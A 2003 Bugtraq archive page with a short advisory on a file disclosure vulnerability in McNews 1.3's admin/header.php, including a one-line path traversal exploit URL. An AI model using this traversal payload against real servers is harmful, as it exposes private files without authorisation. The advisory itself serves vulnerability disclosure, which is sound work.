Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

McNews 1.3 : File Disclosure Vulnerability

From: Sebastien Lelarge <sebastien.lelarge () tremplin-utc net>
Date: 26 Sep 2003 08:40:05 -0000


The vulnerable script is <mcnews_root>/admin/header.php

Exploit it with : header.php?voir=1&skinfile=skin/../../../file/to/view
Previous By Date Next
Previous By Thread Next

Current thread: